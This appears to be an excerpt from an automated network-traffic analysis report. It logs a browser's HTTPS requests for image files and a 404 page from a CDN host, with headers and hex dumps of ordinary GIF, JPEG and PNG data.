                                                      2025-01-12 23:47:53 UTC2339INData Raw: 39 31 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f
                                                      Data Ascii: 917<!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title>Page not found</title> <link rel="ico


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      78192.168.2.44983020.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:53 UTC382OUTGET /images_plus/main/logo.gif?ver=1612840274 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:53 UTC356INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:53 GMT
                                                      Content-Type: image/gif
                                                      Content-Length: 18406
                                                      Connection: close
                                                      Last-Modified: Tue, 09 Feb 2021 03:11:14 GMT
                                                      ETag: "6021fd52-47e6"
                                                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                      Cache-Control: max-age=315360000
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:53 UTC3740INData Raw: 47 49 46 38 39 61 e0 00 5b 00 f7 a3 00 ff ea 19 8a c0 af 4f a0 86 c3 cb 2c 4e 99 4d d0 e6 df c5 e0 d7 88 b2 3d 82 bb a9 53 a2 89 23 86 5a 24 88 69 c5 d0 2a 23 87 5a 62 aa 94 91 c4 b4 43 99 7e e0 d8 24 ef f7 f4 b1 d5 c9 6b a6 45 4f 9b 4d a6 bf 35 40 93 52 23 88 68 e2 dd 21 ee de 20 d4 d6 26 e0 ee ea d1 d2 28 72 b3 9e 33 91 73 b4 c5 30 31 8d 55 31 8d 56 8a b5 3b f1 e4 1d 40 94 51 f1 f8 f6 97 b8 39 99 bc 37 a1 cc bf 5e a1 48 a7 c3 33 c0 dd d4 31 90 72 7b af 40 b6 d8 cd 7a ac 41 40 98 7c 99 c8 b9 a7 d0 c3 6c b0 9b 5d 9f 49 b6 c9 2e 5e a8 91 e2 f0 eb d4 e8 e1 be c9 2e 6c a8 44 7b b8 a5 9f bc 36 33 8d 55 52 9b 4c dd d7 25 80 af 3f 16 81 5d 71 a8 44 ed dd 20 e8 e0 20 17 81 5d 22 86 5a e3 de 21 62 a3 47 15 80 5e ce d0 29 af c3 32 61 a1 48 42 94 51 90 b5 3b 79 ae
                                                      Data Ascii: GIF89a[O,NM=S#Z$i*#ZbC~$kEOM5@R#h! &(r3s01U1V;@Q97^H31r{@zA@|l]I.^.lD{63URL%?]qD ]"Z!bG^)2aHBQ;y
                                                      2025-01-12 23:47:53 UTC4096INData Raw: 34 9e 16 ea 30 01 64 c7 74 21 4b 0e c5 f6 a8 cc a3 30 07 9e 35 b8 04 a3 46 27 06 9b 7c 3c 28 92 a4 49 94 2a 47 26 86 29 4a 26 4d 51 36 71 12 01 ee 11 d4 10 8d 15 1b f4 06 02 3d 94 dc bd 05 3e 88 2d 7a cb b4 e4 02 ba 13 96 53 7e 1e 1d 73 10 85 4c 38 6a 0c d2 9b c8 10 cb 72 45 39 88 5d 20 e9 82 07 47 4d 90 94 7a cd 55 d6 1d 0b 01 01 00 21 f9 04 05 1e 00 a3 00 2c 5b 00 42 00 36 00 0c 00 40 08 ff 00 45 09 1c 48 b0 a0 c1 83 08 13 26 f4 01 0a 54 13 82 40 40 3d 41 98 22 54 01 82 1f 42 85 72 30 50 42 28 04 09 34 26 10 a8 d1 83 40 0e 1f 0d fe 60 d2 10 94 13 51 3e 9e b4 0c 62 10 81 c7 50 13 04 3a 60 a1 31 a5 a8 90 1b 27 68 74 b0 40 a8 4f 85 48 93 2a 4d 1a 71 c9 cb 1f 4d 7a 80 22 f2 d0 07 cd 81 1e 34 22 10 f8 40 94 c7 02 0b 44 65 0d 95 00 68 0a 51 0e 34 5e 84 a0 b5
                                                      Data Ascii: 40dt!K05F'|<(I*G&)J&MQ6q=>-zS~sL8jrE9] GMzU!,[B6@EH&T@@=A"TBr0PB(4&@`Q>bP:`1'ht@OH*MqMz"4"@DehQ4^
                                                      2025-01-12 23:47:53 UTC4096INData Raw: a6 cd 9b 38 73 5a 14 05 73 22 45 20 a3 7a 28 04 e5 83 e2 90 88 45 29 7e a0 e8 a0 a2 a8 14 a3 0a 54 fc 28 81 e4 a8 93 2c 46 41 d5 3a 2a 2b 4c 9a 0b 29 06 19 0a 93 e7 a8 83 4e 39 44 e5 98 c0 c1 c7 50 1e 3a 4a 65 61 b5 c0 82 0f 12 46 49 f8 b0 40 ad 57 9b 40 6b 5a 04 35 c4 6a d6 93 15 3d f4 8d b9 d1 2a 56 ae 5c bd be b4 39 53 b0 ce cb 98 63 c2 04 5a 91 28 43 84 9d 7d 56 14 69 51 b1 54 8b 8d 31 23 30 0b 91 e2 92 a0 43 9d 50 6c 82 b4 e2 d2 51 4d 29 3e 8d 3a 75 54 28 c7 14 b3 6e 85 fa 97 88 ec 8a 43 86 4e 6c f0 1a c8 53 b8 a2 f2 16 58 da f6 6d d3 05 52 27 00 ef 0a 99 b8 4b 1d 41 22 32 2a 29 3a 33 c8 6b 22 47 9f c7 c5 7d ba 00 c7 05 0f 34 4e e0 b8 5d 38 45 ef 03 61 c6 ac 9c b9 7f ff fc 94 35 64 99 7f 04 c6 14 10 00 21 f9 04 05 1e 00 a3 00 2c 5b 00 46 00 28 00 0c
                                                      Data Ascii: 8sZs"E z(E)~T(,FA:*+L)N9DP:JeaFI@W@kZ5j=*V\9ScZ(C}ViQT1#0CPlQM)>:uT(nCNlSXmR'KA"2*):3k"G}4N]8Ea5d!,[F(
                                                      2025-01-12 23:47:54 UTC4096INData Raw: 32 74 08 51 22 45 8b 18 87 76 fc 28 98 64 28 93 a2 50 6e 25 48 04 d4 12 1f a2 a0 b2 24 f2 03 66 10 08 12 c0 fa 9d dd d5 23 8b b0 63 21 b4 26 fc da f0 6c 82 4d 96 34 74 2a ca 09 cb a9 4d 80 83 15 b5 e0 41 cf d9 0e 0a 68 09 94 30 7b 79 e1 d8 87 03 02 00 21 f9 04 05 1e 00 a3 00 2c 5b 00 42 00 36 00 0c 00 40 08 ff 00 45 09 1c f8 03 14 28 1f 03 07 ea 00 d5 23 a1 c3 87 10 23 3a f4 61 b0 89 c0 82 07 7b 80 5a a2 90 61 c2 0f a1 42 39 48 c8 21 d4 83 81 13 42 4d 10 15 12 81 40 16 a1 52 08 4c 11 8a 85 c0 21 44 40 01 09 62 10 a1 0f 26 06 9f 2c 6c e8 30 41 ca 90 10 44 41 a0 19 32 c5 07 81 2d 11 84 3c 29 55 e5 82 87 18 11 3a 1c 2a b1 ab d7 87 39 97 34 10 05 f4 20 4f 50 43 44 fd c8 49 74 60 c9 02 49 13 38 48 29 21 29 04 09 a1 5c 86 2c b0 e0 03 5e 09 1f 16 94 b4 a9 d1 a0
                                                      Data Ascii: 2tQ"Ev(d(Pn%H$f#c!&lM4t*MAh0{y!,[B6@E(##:a{ZaB9H!BM@RL!D@b&,l0ADA2-<)U:*94 OPCDIt`I8H)!)\,^
                                                      2025-01-12 23:47:54 UTC2378INData Raw: a8 50 a2 63 5b ea dd cb 37 e5 40 22 67 63 02 56 da 90 85 5c 0e a2 68 ca 0d 45 f7 a2 5b 0e 6d 45 ea f4 0b 6a 09 4c 50 4f 66 d6 84 1a 6a 72 d5 04 75 45 05 0d 35 b4 a8 5a b2 3a 2e a3 85 20 a1 c0 d6 a8 53 ab 86 4d 2c 32 ad 5d d2 78 4f 53 4e 6d 56 26 6b d7 a2 16 7c 85 ed 10 62 4d 92 b6 45 df 35 7d b4 af f3 e7 d0 a3 4b 2f 19 10 00 21 f9 04 05 1e 00 a3 00 2c 5c 00 46 00 30 00 08 00 40 08 e4 00 45 3d 01 45 90 89 28 81 04 41 19 3c c8 d0 43 81 50 a1 38 2c 10 05 21 05 c4 50 29 3e 1c 84 88 00 01 c4 07 a2 3c 86 9a b0 a0 c1 40 82 44 1a 98 4c 98 b2 21 c4 89 0c 39 84 02 79 70 c2 48 51 1c 0f b2 c0 78 d0 22 0b 20 a0 9e 30 14 05 54 e8 d0 83 1f 20 92 0c f9 c1 a6 04 08 14 25 84 42 80 33 54 81 05 1f a4 4a f8 b0 40 e6 cf 84 a0 52 02 65 d9 00 22 0b 51 36 2f 86 fa 00 41 2d 44 89
                                                      Data Ascii: Pc[7@"gcV\hE[mEjLPOfjruE5Z:. SM,2]xOSNmV&k|bME5}K/!,\F0@E=E(A<CP8,!P)><@DL!9ypHQx" 0T %B3TJ@Re"Q6/A-D


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      79192.168.2.44983120.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:53 UTC374OUTGET /images/dc_new.gif?ver=1606790076 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      Accept: */*
                                                      Sec-Fetch-Site: none
                                                      Sec-Fetch-Mode: cors
                                                      Sec-Fetch-Dest: empty
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:54 UTC354INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:53 GMT
                                                      Content-Type: image/gif
                                                      Content-Length: 1251
                                                      Connection: close
                                                      Last-Modified: Tue, 01 Dec 2020 02:34:36 GMT
                                                      ETag: "5fc5abbc-4e3"
                                                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                      Cache-Control: max-age=315360000
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:54 UTC1251INData Raw: 47 49 46 38 39 61 15 00 0c 00 a2 04 00 ff ff ff ff 00 00 ff 05 05 ff ff 00 ff ff ff 00 00 00 00 00 00 00 00 00 21 ff 0b 4e 45 54 53 43 41 50 45 32 2e 30 03 01 00 00 00 21 ff 0b 58 4d 50 20 44 61 74 61 58 4d 50 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d 6c 6e 73 3a 72 64 66 3d 22 68
                                                      Data Ascii: GIF89a!NETSCAPE2.0!XMP DataXMP<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xmlns:rdf="h


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      80192.168.2.44983220.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:53 UTC622OUTGET /images_plus/index/en/liveinplay.gif?ver=1683086133 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://b45032.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:54 UTC353INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:53 GMT
                                                      Content-Type: image/gif
                                                      Content-Length: 620
                                                      Connection: close
                                                      Last-Modified: Wed, 03 May 2023 03:55:33 GMT
                                                      ETag: "6451db35-26c"
                                                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                      Cache-Control: max-age=315360000
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:54 UTC620INData Raw: 47 49 46 38 39 61 cc 00 17 00 c4 00 00 ff df 1b 4d a0 80 c4 c8 29 89 c0 aa 4d 98 46 89 b0 38 c4 e0 d5 b6 d8 ca a7 d0 c0 21 88 60 6b b0 95 f1 f8 f5 e2 f0 ea 3f 98 75 30 90 6a 5c a8 8a f1 d9 1e 21 86 51 d3 e8 e0 e2 d3 22 30 8c 4e 7a b8 a0 98 c8 b5 6b a4 3f b6 c2 2d 3f 92 4a 5c 9e 43 7a aa 3c d3 cd 26 a7 bc 31 ff ff ff 12 80 55 21 ff 0b 4e 45 54 53 43 41 50 45 32 2e 30 03 01 00 00 00 21 f9 04 05 00 00 1f 00 2c 00 00 00 00 cc 00 17 00 00 05 ff e0 27 8e 64 69 9e 68 aa ae 6c eb be 70 2c cf 74 6d df 78 ae ef 7c ef ff c0 a0 70 48 2c 1a 8f c8 56 86 40 11 51 08 04 13 34 92 0a 04 2a 03 45 a0 64 75 a8 1c 5d 52 c2 9a e0 06 1a c9 b4 1a 05 00 08 44 85 76 a1 d4 8e 9e 02 9e bc 9e f1 18 e5 07 2a 07 79 08 24 0a 79 16 24 78 1e 84 6b 8d 6b 6d 6f 1f 71 6d 19 24 75 28 8a 12 06
                                                      Data Ascii: GIF89aM)MF8!`k?u0j\!Q"0Nzk?-?J\Cz<&1U!NETSCAPE2.0!,'dihlp,tmx|pH,V@Q4*Edu]RDv*y$y$xkkmoqm$u(


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      81192.168.2.44983320.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:53 UTC612OUTGET /images_plus/index/g04.jpg?ver=1606793375 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://b45032.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:54 UTC357INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:54 GMT
                                                      Content-Type: image/jpeg
                                                      Content-Length: 10687
                                                      Connection: close
                                                      Last-Modified: Tue, 01 Dec 2020 03:29:35 GMT
                                                      ETag: "5fc5b89f-29bf"
                                                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                      Cache-Control: max-age=315360000
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:54 UTC3739INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 04 03 03 04 03 03 04 04 04 04 05 05 04 05 07 0b 07 07 06 06 07 0e 0a 0a 08 0b 10 0e 11 11 10 0e 10 0f 12 14 1a 16 12 13 18 13 0f 10 16 1f 17 18 1b 1b 1d 1d 1d 11 16 20 22 1f 1c 22 1a 1c 1d 1c ff db 00 43 01 05 05 05 07 06 07 0d 07 07 0d 1c 12 10 12 1c 1c 1c 1c 1c 1c 1c 1c 1c 1c 1c 1c 1c 1c 1c 1c 1c 1c 1c 1c 1c 1c 1c 1c 1c 1c 1c 1c 1c 1c 1c 1c 1c 1c 1c 1c 1c 1c 1c 1c 1c 1c 1c 1c 1c 1c 1c 1c 1c 1c ff c2 00 11 08 00 51 01 0f 03 01 11 00 02 11 01 03 11 01 ff c4 00 1c 00 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 03 01 02 04 05 06 07 00 08 ff c4 00 1b 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 02 01 04 05 03 06 07 ff da 00 0c 03 01 00 02 10 03 10 00 00 00 f9 3f 1f 61 e0
                                                      Data Ascii: JFIFC ""CQ?a
                                                      2025-01-12 23:47:54 UTC4096INData Raw: 5a 7d 9f e9 b8 96 cf b2 32 ba 09 63 76 dd 08 00 54 f6 5f ac 4a 5d d4 5f df fa 01 51 d1 0a 42 c9 b9 84 43 0e e5 92 f8 93 18 99 6e 2b 84 20 04 54 99 d7 f1 07 ee 3c bc bc 61 f8 f6 62 5a 67 5a 2d 5f 9d e5 1d 04 e6 14 0b 18 4a 36 ff 00 d3 46 f3 fc 34 b4 d8 de 47 7b cc da 5f 66 2e fe 20 0c 51 9f c3 b3 8c c1 95 94 28 e6 e5 68 76 5c 25 7e 55 d4 da e3 97 06 3d 4a f1 e0 6e 5c 83 62 fe ee 5f 20 b8 ca a9 16 e4 d6 a3 5e c5 32 60 12 c0 94 e0 b3 e4 bb 27 c7 5a e0 89 2d b6 ec 2f 26 dd 9b 77 2a 59 fb ba 07 5e aa 1d 8e 59 b1 5d 7c 7a 86 ad c8 3d fd ff 00 c6 e3 79 4a 74 5f bf 01 71 6a 6c f0 56 5c a5 4c 7c 58 5e 65 83 7a f0 53 c7 64 cc 30 f4 7e 06 70 7c fa 9a 51 7e f6 2a 5b 8d ad d3 d7 36 55 b7 ed 9b 2f ca 95 14 ce 7a 86 0d 4e 1b 0c 75 e7 75 29 63 30 eb 4a fc dd fd 46 01 ec
                                                      Data Ascii: Z}2cvT_J]_QBCn+ T<abZgZ-_J6F4G{_f. Q(hv\%~U=Jn\b_ ^2`'Z-/&w*Y^Y]|z=yJt_qjlV\L|X^ezSd0~p|Q~*[6U/zNuu)c0JF
                                                      2025-01-12 23:47:54 UTC2852INData Raw: c1 73 f4 1d 4f db e7 3a 5c 2f 73 ff 00 27 d3 53 4a 56 d3 73 60 66 a8 c2 de 0b b1 6c 80 70 0b 00 34 b1 79 74 03 78 01 94 28 f9 0e ba 72 f1 51 a9 65 54 6c 37 10 4e fa 59 7a cd 42 92 8f 1b 69 d3 76 ff 00 57 76 ba f4 79 a3 fc 54 73 06 ba 06 24 c7 b3 c6 03 48 f6 b4 bc 35 52 8d 58 f0 9a 90 e3 f6 d5 bf e5 6e 9a 7b 15 65 4b ec 00 32 62 42 bf 98 52 18 4e eb a8 56 a2 9e cf 28 2d c1 46 df cb 0c 6a 29 eb 1a f4 5c 87 22 a0 6b 84 9e 52 a7 bb fd 02 d1 e4 4e 96 ea dd 9d ec 75 ea 54 21 01 bc e1 2d 1f b4 e9 1f bf 74 b6 d8 16 82 ca 11 8d d3 24 46 cb 6e 09 d2 7e 2a d6 47 71 1c bd e2 55 01 7e 21 54 12 3a 5d a6 e2 5a 54 ea 11 60 8e 32 98 06 67 17 f8 66 35 0a 0d 36 3e 1b d6 ad aa 73 51 d4 39 42 39 8b 17 5e 25 fe d1 20 b0 fc da d9 1c ad 41 ef 20 62 a1 bf 52 f8 fa 8d 75 a7 20 8b
                                                      Data Ascii: sO:\/s'SJVs`flp4ytx(rQeTl7NYzBivWvyTs$H5RXn{eK2bBRNV(-Fj)\"kRNuT!-t$Fn~*GqU~!T:]ZT`2gf56>sQ9B9^% A bRu


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      82192.168.2.44983420.255.122.934434284C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2025-01-12 23:47:53 UTC612OUTGET /images_plus/index/g02.png?ver=1606793399 HTTP/1.1
                                                      Host: 5getfab.segrft.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                      Sec-Fetch-Site: cross-site
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: image
                                                      Referer: https://b45032.com/
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      2025-01-12 23:47:54 UTC356INHTTP/1.1 200 OK
                                                      Date: Sun, 12 Jan 2025 23:47:54 GMT
                                                      Content-Type: image/png
                                                      Content-Length: 15513
                                                      Connection: close
                                                      Last-Modified: Tue, 01 Dec 2020 03:29:59 GMT
                                                      ETag: "5fc5b8b7-3c99"
                                                      Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                      Cache-Control: max-age=315360000
                                                      Access-Control-Allow-Origin: *
                                                      Server: CDNoh
                                                      X-Cache-Status: HIT
                                                      Accept-Ranges: bytes
                                                      2025-01-12 23:47:54 UTC3740INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 0d 00 00 00 4f 08 03 00 00 00 c6 2b 60 e9 00 00 03 00 50 4c 54 45 62 4f 2e 0d 0f 0b 01 01 01 66 52 30 0a 0c 07 38 38 38 0a 08 08 04 08 03 08 02 01 6a 56 35 3a 3b 35 10 0d 0f 05 08 09 62 4b 2b 6b 55 2e 09 0b 0d 65 4d 2d 38 37 34 3d 3d 3b 57 45 24 0a 09 03 8b 70 40 18 19 16 0b 0e 12 12 0d 06 88 6c 3e 0d 09 0c 99 7a 47 6f 58 30 9d 7d 4a 7c 64 38 52 41 21 94 76 43 14 14 10 1e 1e 17 5c 49 28 8f 73 44 79 60 34 86 6a 3a 66 51 28 10 03 01 82 66 38 73 59 33 81 68 3f 29 2a 26 a3 82 4d 8f 0e 0e a9 87 4f 34 33 33 24 23 25 07 12 09 ae 8c 51 39 35 2a 23 18 09 b5 91 55 54 16 13 9c 0f 11 93 79 4a 41 31 1a 13 0d 14 2c 2e 2e 1f 1c 20 2d 1c 04 28 1d 14 be 12 13 3c 2a 0d 75 5d 30 25 24 1c 34 2b 29 87 1a 1b 31 27 13 38
                                                      Data Ascii: PNGIHDRO+`PLTEbO.fR0888jV5:;5bK+kU.eM-874==;WE$p@l>zGoX0}J|d8RA!vC\I(sDy`4j:fQ(f8sY3h?)*&MO433$#%Q95*#UTyJA1,.. -(<*u]0%$4+)1'8
                                                      2025-01-12 23:47:54 UTC4096INData Raw: 24 e2 44 3d be ff 24 3d 32 15 a1 6a 9e 37 2a b4 e1 c0 81 0d 0d 5e 47 7a ba 4c a2 d7 ff f5 06 78 e0 26 49 4b 17 a4 a2 c9 50 dc 95 c7 4d 88 8a 8b 0a f0 a0 7b 22 42 3c 10 a4 2a 35 ae b5 04 f9 42 83 9a 89 10 ef 29 d5 38 bd f1 58 64 4f 85 e7 f0 0a 70 38 b4 ef 8e d5 3a 7d fa d4 ec 05 46 79 4e fe 00 b9 44 55 fb a4 a9 36 47 3e f7 8c 5f ab 05 89 17 d3 5a 12 1d 1d 97 a7 69 2b 8b d5 be 1d 13 47 1c af 9e b5 76 f4 c0 29 8e fd e6 c9 ab 3e 7d d8 fd e1 e5 87 bd e7 09 86 29 b0 a8 98 b9 74 a9 b3 53 d5 f4 a4 a4 73 8d dd e9 ae 0c 98 0a 0b 4d f8 4f 44 80 a5 e8 c5 9b b1 35 6c 6a 63 32 19 66 83 cd 46 b2 27 7a 29 89 22 b5 67 26 44 66 19 82 12 49 27 6a c0 a0 cf fa f4 97 30 65 19 a8 8e 79 ba be 13 69 62 b6 c7 6c 83 44 93 80 43 4e b2 d0 0d 92 09 c2 91 46 04 4d 96 8a 8b 0b 82 91 c1
                                                      Data Ascii: $D=$=2j7*^GzLx&IKPM{"B<*5B)8XdOp8:}FyNDU6G>_Zi+Gv)>})tSsMOD5ljc2fF'z)"g&DfI'j0eyiblDCNFM
                                                      2025-01-12 23:47:54 UTC4096INData Raw: 55 9e 72 b9 8c 46 a3 2b d0 cd 7c 7f 8a 69 ef bc 7a e1 c2 17 4d e9 d2 15 41 41 41 e1 f1 f1 31 73 12 a6 df 7e db bf 44 72 19 f1 c8 50 5d 4e 6a ea 87 9f 61 38 20 52 57 ca b9 be 14 37 71 05 68 cc f0 10 88 af 5c f9 16 b2 20 16 37 ae 5f bb 7e 83 a5 71 e9 d7 87 df fb d2 84 bb 18 40 03 38 00 80 0e d8 43 ba 09 c8 37 92 47 e2 90 ff a5 0d ac e0 0f 6f fe 1e b5 63 21 c2 d3 79 96 e9 4d 8e 48 8e 5d 6c b1 f3 39 7c 74 15 a8 1f 32 f4 62 ac 2c 80 c2 a3 21 53 4a 56 8a 34 a8 bc 66 70 70 6f 63 a3 35 75 de 8c c5 90 84 4f 34 d2 40 4a 28 22 82 57 24 f4 f4 ac 5e ad ce 62 3a cf 9f 6e 32 46 ec 4f 28 a9 d9 56 1e 18 8d 09 89 54 a4 56 57 ba 10 48 93 b3 48 93 8a 96 6f a0 8c 0b 57 99 36 63 c7 2d 33 17 c4 87 83 c7 ea 84 84 e9 b7 2c 5e fc cd dc d4 42 22 02 63 26 26 7d 83 db cb c3 95 e9 e9
                                                      Data Ascii: UrF+|izMAAA1s~DrP]Nja8 RW7qh\ 7_~q@8C7Goc!yMH]l9|t2b,!SJV4fppoc5uO4@J("W$^b:n2FO(VTVWHHoW6c-3,^B"c&&}
                                                      2025-01-12 23:47:54 UTC3581INData Raw: ec 74 83 b3 bb 57 e3 f2 a4 a4 c8 ea 83 5f 7e 49 c7 57 b9 5b 36 45 fa ac f7 5b 3f 0e a3 80 39 d4 d5 51 bb c2 d6 de 99 75 8c d6 ee 59 8f 79 2a ca 0c 36 49 b7 c2 68 64 be 88 1d d6 c4 a2 a2 5d 37 74 b4 63 94 36 0f 68 bf 19 2d 3c ea f1 73 83 a4 e9 e9 69 53 8e ff f6 70 59 db 8f 86 e0 04 b8 89 42 a1 e6 4f 18 f9 08 b7 0b 73 89 81 02 c3 c5 45 07 37 81 5b 40 80 41 e2 c6 41 39 17 34 9c 07 2b 40 03 e3 53 dc 50 1c 8d db dc 94 1a a2 c1 ac 4c 4d 02 08 c2 41 22 36 96 d4 bb 08 d1 03 3c ec 66 d2 0b ec 03 3c 18 11 ca b8 b7 a2 d2 33 4a 17 95 1a 90 61 7f cc 4b 85 72 ab 17 45 fb f9 7d da c1 3c a3 fd 6c d7 f9 f3 b5 29 29 27 06 52 ce d7 8d 8e 82 c6 54 0b 9d ec 9a bd 84 4e a8 45 0b 17 fa 3c ee 29 0c 7a f6 be 82 b2 96 60 3c 1b fb 84 c5 13 cf 60 3c 4a 42 9a 41 5d 5e e1 6a c0 e9 4e
